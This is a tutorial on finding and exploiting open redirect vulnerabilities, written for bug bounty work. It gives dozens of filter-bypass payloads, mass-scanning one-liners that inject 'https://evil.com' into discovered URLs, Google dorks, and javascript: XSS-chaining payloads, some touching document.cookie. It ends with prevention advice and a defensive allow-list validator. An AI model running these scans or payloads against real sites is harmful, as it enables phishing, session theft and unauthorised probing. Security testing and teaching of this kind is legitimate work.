Open Redirect Guide

Comprehensive guide to open redirect vulnerabilities, from basic domain spoofing to advanced filter bypasses and XSS chaining.

Introduction

What is Open Redirect?
Open Redirect = a vulnerability that allows attackers to redirect users to malicious websites
Root cause of the vulnerability
Occurs when a web app accepts user input for a redirect URL without proper validation
Potential impacts even from simple redirects
Consequences: Phishing, malware distribution, session hijacking
Understanding Open Redirect Basics

Basic example of an open redirect URL
https://example.com/redirect?url=http://malicious.com
Manual Testing 1: Simply Change the Domain

#1 Most basic bypass - replace target domain with malicious one
?redirect=https://example.com → ?redirect=https://evil.com

Manual Testing 2: Bypass Protocol Blacklist

#2 Bypass when protocol (https://) is blacklisted
?redirect=https://example.com → ?redirect=//evil.com

Manual Testing 3: Bypass Double Slash Blacklist

#3 Bypass when double slash (//) is blacklisted
?redirect=https://example.com → ?redirect=\\evil.com

Manual Testing 4: Bypass Using http: or https:

#4 Bypass by omitting slashes after protocol
?redirect=https://example.com → ?redirect=https:example.com

Manual Testing 5: Bypass Using %40 (At Symbol)

#5 Use encoded @ symbol to bypass domain checks
?redirect=example.com → ?redirect=example.com%40evil.com

Manual Testing 6: Bypass Filters That Only Check the Domain Name

#6 Append attacker domain to end of target domain
?redirect=example.com → ?redirect=example.comevil.com

Manual Testing 7: Bypass Using Dot Encoding %2e

#7 Use encoded dot to bypass domain filters
?redirect=example.com → ?redirect=example.com%2eevil.com
Manual Testing 8: Bypass Using Question Mark

#8 Use query string to obscure original domain
?redirect=example.com → ?redirect=evil.com?example.com

Manual Testing 9: Bypass Using Hash %23

#9 Use fragment to hide malicious domain
?redirect=example.com → ?redirect=evil.com%23example.com

Manual Testing 10: Bypass Using / Symbol

#10 Use path separator to add malicious domain
?redirect=example.com → ?redirect=example.com/evil.com

Manual Testing 11: Bypass Using Chinese Dot %E3%80%82

#11 Use Unicode-encoded Chinese dot to bypass filters
?redirect=example.com → ?redirect=evil.com%E3%80%82%23example.com

Manual Testing 12: Bypass Using Null Byte %0d/%0a

#12 Inject null bytes to break validation
?redirect=/ → ?redirect=/%0d/evil.com

Manual Testing 13: Encoded URL Redirects

#13 Use full URL encoding to bypass filters
https://example.com/redirect?url=http%3A%2F%2Fmalicious.com
Manual Testing 14: Path-Based Redirects

#14 Use path-style redirects instead of query parameters
https://example.com/redirect/http://malicious.com

Manual Testing 15: Data URI Redirects

#15 Use data URIs to execute arbitrary content
https://example.com/redirect?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnVGhpcyBpcyBhbiBhdHRhY2snKTwvc2NyaXB0Pg==

Manual Testing 16: JavaScript Scheme Redirects

#16 Use javascript: scheme to execute JS
https://example.com/redirect?url=javascript:alert('XSS');//

Manual Testing 17: Open Redirect via HTTP Header

#17 Inject redirect headers directly
Location: http://malicious.com
X-Forwarded-Host: evil.com
Refresh: 0; url=http://malicious.com

Manual Testing 18: Path Traversal Hybrids

#18 Combine path traversal with redirect
/redirect?url=/../../https://evil.com

Manual Testing 19: SVG Payload

#19 Use SVG with onload to redirect
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='https://evil.com/'" xmlns="http://www.w3.org/2000/svg"></svg>
Manual Testing 20: Case-Sensitive Variations

#20 Use random casing to evade blacklists
//GOOGLE.com/ → Bypass case-sensitive filters
#20 Variant with mixed casing
//GoOgLe.com/ → More random casing variations

Manual Testing 21: Trailing Special Characters

#21 Use trailing fragment
//google.com/#/ → Fragment to obscure redirect
#21 Variant with ampersands
//google.com/;&/ → Extra special characters

Manual Testing 22: IP Address Variants

#22 Use decimal encoding for IP
http://3232235777 → Decimal IP for 192.168.1.1
#22 Variant with hex encoding
http://0xC0A80001 → Hexadecimal IP

Manual Testing 23: IPv6 Notation

#23 Use IPv6 notation to bypass filters
http://[::1]/ → IPv6 loopback
#23 Variant with IPv4-mapped IPv6
http://[::ffff:192.168.1.1]/ → IPv4-mapped IPv6

Manual Testing 24: Non-Standard Ports

#24 Use non-standard ports to bypass filters
http://google.com:81 → Different port
#24 Variant with HTTPS port
https://google.com:444 → HTTPS on different port

Manual Testing 25: Unicode Obfuscation in Paths

#25 Inject Unicode characters to break parsing
/%E2%80%http://8Egoogle.com → Unicode injection
#25 Variant with different Unicode bytes
/%C2%http://A0google.com → More unicode obfuscation
Automated Tools 1: Reconnaissance (Single Domain)

Collect URLs from multiple sources for a single domain
echo target.com | gau --o urls1.txt
echo target.com | katana -d 2 -o urls2.txt
echo target.com | urlfinder -o urls3.txt
echo target.com | hakrawler > urls4.txt

Automated Tools 2: Reconnaissance (Multiple Subdomains)

Collect all subdomains first, then gather URLs
subfinder -d target.com -all -o subdomains1.txt
assetfinder --subs-only target.com > subdomains2.txt
sort -u subdomains1.txt subdomains2.txt -o uniqsubs.txt
cat uniqsubs.txt | httpx-toolkit -o finallist.txt

Automated Tools 3: Filtering URLs for Redirect Parameters

Filter URLs containing common redirect parameters
cat final.txt | grep -Pi "returnUrl=|continue=|dest=|destination=|forward=|go=|goto=|login?to=|login_url=|logout=|next=|next_page=|out=|g=|redir=|redirect=|redirect_to=|redirect_uri=|redirect_url=|return=|returnTo=|return_path=|return_to=|return_url=|rurl=|site=|target=|to=|uri=|url=|qurl=|rit_url=|jump=|jump_url=|originUrl=|origin=|Url=|desturl=|u=|Redirect=|location=|ReturnUrl=|redirect_url=|redirect_to=|forward_to=|forward_url=|destination_url=|jump_to=|go_to=|goto_url=|target_url=|redirect_link=" | tee redirect_params.txt
More effective approach using the gf tool pattern
cat final.txt | gf redirect | uro | sort -u | tee redirect_params.txt
CoffinXP GF pattern for redirect parameters
https://github.com/coffinxp/GFpattren/blob/main/redirect.json
Automated Tools 4: Final Exploitation Phase

Test all filtered URLs with the evil.com payload
cat redirect_params.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
One-liner for a single target domain
subfinder -d vulnweb.com -all | httpx-toolkit -silent | gau | gf redirect | uro | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"

Automated Tools 5: Bypass Payloads Testing

Test all bypass payloads from a custom list
cat redirect_params.txt | while read url; do cat loxs/payloads/or.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "google.com"

Automated Tools 6: Fuzzing with FFUF

Fuzz redirect parameters with bypass payloads, proxied to Burp
ffuf -w redirect_params.txt:PARAM -w loxs/payloads/or.txt:PAYLOAD -u "https://site.com/bitrix/redirect.php?PARAM=PAYLOAD" -mc 301,302,303,307,308 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -x http://localip:8080 -t 10 -mr "Location: http://google.com"

Automated Tools 7: Testing with CURL

Mass test open redirects with CURL
cat urls.txt | qsreplace "https://evil.com" | xargs -I {} curl -s -o /dev/null -w "%{url_effective} -> %{redirect_url}\n" {}

Automated Tools 8: Nuclei Template

Automated scanning with a Nuclei open redirect template (the host list is read from the file, not the file name)
cat subdomains.txt | nuclei -t openRedirect.yaml -c 30

Automated Tools 9: VirusTotal

Use the VirusTotal API to find redirect URLs
https://www.virustotal.com/vtapi/v2/domain/report?apikey=<api_key>&domain=target.com
Process VirusTotal results with gf
./virustotal.sh domains.txt | gf redirect
Custom bypass payloads list
https://github.com/coffinxp/loxs/blob/main/payloads/or.txt

Automated Tools 10: Loxs Tool

Prepare URLs for the Loxs tool
cat urls.txt | sed 's/=.*/=/' | uro >final.txt
Simpler way to find open redirects
Use Loxs tool for automatic open redirect detection with no false positives
Open Redirect to XSS (ATO) - Increase Impact

#Basic payload, javascript code executed after 'javascript:'
javascript:alert(1)
#Bypass 'javascript' word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)
#Javascript with '://' + double encoding, bypasses PHP FILTER_VALIDATE_URL
javascript://%250Aalert(1)
#Variation with query string using comments/ternary operator
javascript://%250Aalert(1)//?1
#Tab-separated javascript to bypass filters
%09Jav%09ascript:alert(document.domain)
#Capitalized 'Alert' to evade case-sensitive filters
javascript://%250Alert(document.location=document.cookie)
#Path-based javascript injection
/%09/javascript:alert(1);
#Using encoded backslash to bypass filters
//%5cjavascript:alert(1);
#Mixed case + CRLF to bypass filters
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
#Variant with confirm() instead of alert()
javascript:confirm(1)
#Bypass whitelist by hiding payload in query string
javascript://https://whitelisted.com/?z=%0Aalert(1)
#Advanced whitelist bypass with CRLF
jaVAscript://whitelisted.com//%0d%0aalert(1);//
#Using encoded spaces in payload
javascript://whitelisted.com?%a0alert%281%29
#Obscure path-based payload
/x:1/:///%01javascript:alert(document.cookie)/
Google Dorking & Automation

Google dork to find URLs with redirect parameters
site:target (inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= | inurl:dest= | inurl:target= | inurl:redirect_uri= | inurl:redirect_url= | inurl:checkout_url= | inurl:continue= | inurl:return_path= | inurl:returnTo= | inurl:out= | inurl:go= | inurl:login?to= | inurl:origin= | inurl:callback_url= | inurl:jump= | inurl:action_url= | inurl:forward= | inurl:src= | inurl:http | inurl:&)
Simplified dork for a specific target
inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:target
Process dork results with gf + qsreplace + httpx
cat urls.txt | gf redirect | uro | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
Test all bypass payloads on dork results
cat urls.txt | gf redirect | uro | while read url; do cat /home/coffinxp/loxs/payloads/or.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "google.com"
Risks and Impacts

Most common impact - steal user credentials
Phishing Attacks: Users tricked into entering credentials on fake websites
Spread malware via trusted-domain redirects
Malware Distribution: Redirecting to sites that automatically download malware
Take over user accounts via session theft
Session Hijacking: Stealing session cookies through crafted URLs

Bug Bounty Payouts

Payout range for small targets
Small Websites: $50 — $200
Payout range for medium targets
Mid-Sized Companies: $200 — $500
Payout range for large targets
Big Corporations: $500 — $1000
Higher payout when chained to account takeover
Open Redirect to ATO: $1000 — $5000
How to Prevent

Most effective prevention method
#1: Whitelist URLs - Restrict redirection to trusted domains only
Avoid full URLs in redirect parameters
#2: Use Relative Paths - Ditch full URLs for safer relative paths
Strict input validation for redirect parameters
#3: Validate Inputs - Block any unknown or suspicious redirect values
User awareness before external redirects
#4: Show Warnings - Notify users before redirecting to external websites
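The four prevention rules above, applied to the bypass payloads from the manual-testing sections and the javascript: payloads from the XSS chaining section, as an added example that is not code from the original page or from any tool it names: an allow-list validator that accepts only a same-site path or an https URL to the assumed hosts example.com / www.example.com, and is checked against the guide's own payloads.

```python
from urllib.parse import urlsplit, unquote

# Hosts the application may redirect to (assumed placeholders, not from the page).
ALLOWED_HOSTS = {"example.com", "www.example.com"}

def is_safe_redirect(target: str) -> bool:
    """Allow only a same-site absolute path or an https URL to an allow-listed host."""
    # Decode once and refuse any C0 control character (CR, LF, TAB, NUL ...) before
    # parsing: urlsplit silently strips \t\r\n, which is exactly what java%0d%0ascript: needs.
    decoded = unquote(target or "")
    if not decoded or any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return False
    # Browsers treat a backslash like a slash, so \\evil.com is really //evil.com.
    normalized = decoded.replace("\\", "/")
    # Same-site path: exactly one leading slash, which excludes the //host forms.
    if normalized.startswith("/") and not normalized.startswith("//"):
        return True
    parts = urlsplit(normalized)
    # Scheme allow-list rejects javascript:, data:, http: and scheme-only https:host.
    if parts.scheme != "https" or not parts.hostname:
        return False
    try:
        port = parts.port  # ValueError on a malformed port such as :abc
    except ValueError:
        return False
    # No userinfo (example.com@evil.com), no port, then an exact host match, so
    # example.comevil.com, example.com.evil.com and the full-width dot all fail.
    if "@" in parts.netloc or port is not None:
        return False
    return parts.hostname.rstrip(".") in ALLOWED_HOSTS

# Constructed sample input: bypass payloads from this guide (data: payload shortened).
PAGE_PAYLOADS = (
    "//evil.com", r"\\evil.com", "https:example.com", "https://example.com%40evil.com",
    "https://example.comevil.com", "https://example.com%2eevil.com",
    "evil.com?example.com", "https://evil.com%23example.com",
    "evil.com%E3%80%82%23example.com", "/%0d/evil.com", "http%3A%2F%2Fmalicious.com",
    "data:text/html;base64,PHNjcmlwdD48L3NjcmlwdD4=", "javascript:alert('XSS');//",
    "java%0d%0ascript%0d%0a:alert(0)", "%09Jav%09ascript:alert(document.domain)",
    "//%5cjavascript:alert(1);", "https://example.com:444", "http://3232235777",
)
LEGIT_TARGETS = ("/account/settings?tab=1", "https://www.example.com/login")

def rejected(candidates=PAGE_PAYLOADS):
    """Return the subset of candidates the validator refuses."""
    return [c for c in candidates if not is_safe_redirect(c)]

if __name__ == "__main__":
    print(f"rejected {len(rejected())}/{len(PAGE_PAYLOADS)}; legit refused: {rejected(LEGIT_TARGETS)}")
```

Note that a blocklist of strings such as "//" or "javascript" is what every payload on this page is built to evade; the validator never looks for bad strings, it only recognises the two shapes it is willing to accept.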
Conclusion

Final takeaway
Open Redirect vulnerabilities remain a critical threat to web application security
Summary of key points
By understanding technical aspects, detection methods, and prevention strategies, developers and security researchers can effectively mitigate risks

Tools & Resources